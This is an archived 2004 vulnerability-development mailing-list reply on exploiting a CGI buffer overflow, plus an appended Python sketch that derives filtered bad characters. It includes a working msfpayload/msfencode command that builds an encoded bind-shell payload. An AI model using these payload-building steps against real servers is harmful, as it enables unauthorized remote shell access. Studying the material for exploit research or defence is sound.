Vulnerability Development mailing list archives

Re: Problem exploiting a CGI overflow


From: Vlad902 <vlad902 () gmail com>
Date: Wed, 24 Nov 2004 10:11:58 -0800

On Wed, 24 Nov 2004 14:55:12 +0000, Víctor Henríquez
<vhenriquez () grancanaria com> wrote:
> > In short, looking at the gdb output- it looks like you are on the right
> > path and that there is possibly a problem with your shellcode.
>
> You are correct. There is a problem with the shellcode, but a rare problem. The
> shellcode is OK (it's aleph1 shellcode, smashing the stack), but when it is
> copied to the buffer, characters 0xb and 0xc are changed to 0x20. Why?

Probably because of server-side filters.

> I wrote a nasty shellcode without 0xb,0xc and now I have another problem. The
> program calls execve() but doesn't give me a shell... my new shellcode doesn't
> have exit(0). Is this a problem?

The exit() is only reached if execve() fails.

> Now I investigate this, but ideas are welcome...
>
> I appreciate your help.

I'd just use the metasploit framework to help you with the shellcode
generation, i.e.:

$ ./msfpayload linx86_bind LPORT=1234 R | ./msfencode -b "\x00\x0b\x0c" -t c
[*] Using Msf::Encoder::PexFnstenvMov with final size of 106 bytes

There are no plain execve() payloads but this should serve fine.

> --
> Víctor Henríquez

-vlad902
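As an added illustration that is not part of the thread: the two bytes that came back as 0x20 are C whitespace (0x0b is `\v`, 0x0c is `\f`), which is consistent with the server normalizing whitespace in the request. The small Python model below assumes such a filter (an assumption based on the symptom, not the actual server's code), diffs a buffer against its filtered copy, and derives the bad-character list an encoder would need.

```python
import string

# Bytes for which C isspace() is true: space, \t, \n, \v, \f, \r.
# 0x0b (\v) and 0x0c (\f) are in this set, which explains why those two
# values in particular came back as 0x20 after the copy.
C_WHITESPACE = frozenset(b" \t\n\v\f\r")


def normalize_whitespace(data: bytes) -> bytes:
    """Assumed model of the server-side filter: every C-whitespace byte
    becomes a single space (0x20); all other bytes pass through unchanged."""
    return bytes(0x20 if b in C_WHITESPACE else b for b in data)


def find_altered_bytes(data: bytes, transform=normalize_whitespace):
    """Diff `data` against its filtered copy and return the distinct byte
    values that the filter changed, sorted ascending."""
    filtered = transform(data)
    if len(filtered) != len(data):
        raise ValueError("filter changed the length; positional diff is meaningless")
    return sorted({orig for orig, new in zip(data, filtered) if orig != new})


def badchars_for_filter(transform=normalize_whitespace) -> bytes:
    """Probe all 256 byte values through the filter once and return those it
    alters. This is the list to hand to an encoder (e.g. msfencode -b).
    Note 0x20 itself is NOT in the list: it maps to 0x20 and so survives."""
    probe = bytes(range(256))
    return bytes(find_altered_bytes(probe, transform))


def as_encoder_arg(badchars: bytes, include_nul: bool = True) -> str:
    """Render the bad-character set as a \\xNN string. NUL is added by default
    because a strcpy()-style overflow stops at it even though no whitespace
    filter touches it."""
    values = set(badchars)
    if include_nul:
        values.add(0x00)
    return "".join(f"\\x{b:02x}" for b in sorted(values))


# Constructed sample buffer (not real shellcode): contains \v and \f plus a
# few bytes the filter leaves alone.
SAMPLE = b"\x31\xc0\x0b\x41\x0c\x20\x7f"

if __name__ == "__main__":
    print("altered in sample:", [hex(b) for b in find_altered_bytes(SAMPLE)])
    print("encoder bad chars:", as_encoder_arg(badchars_for_filter()))
```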

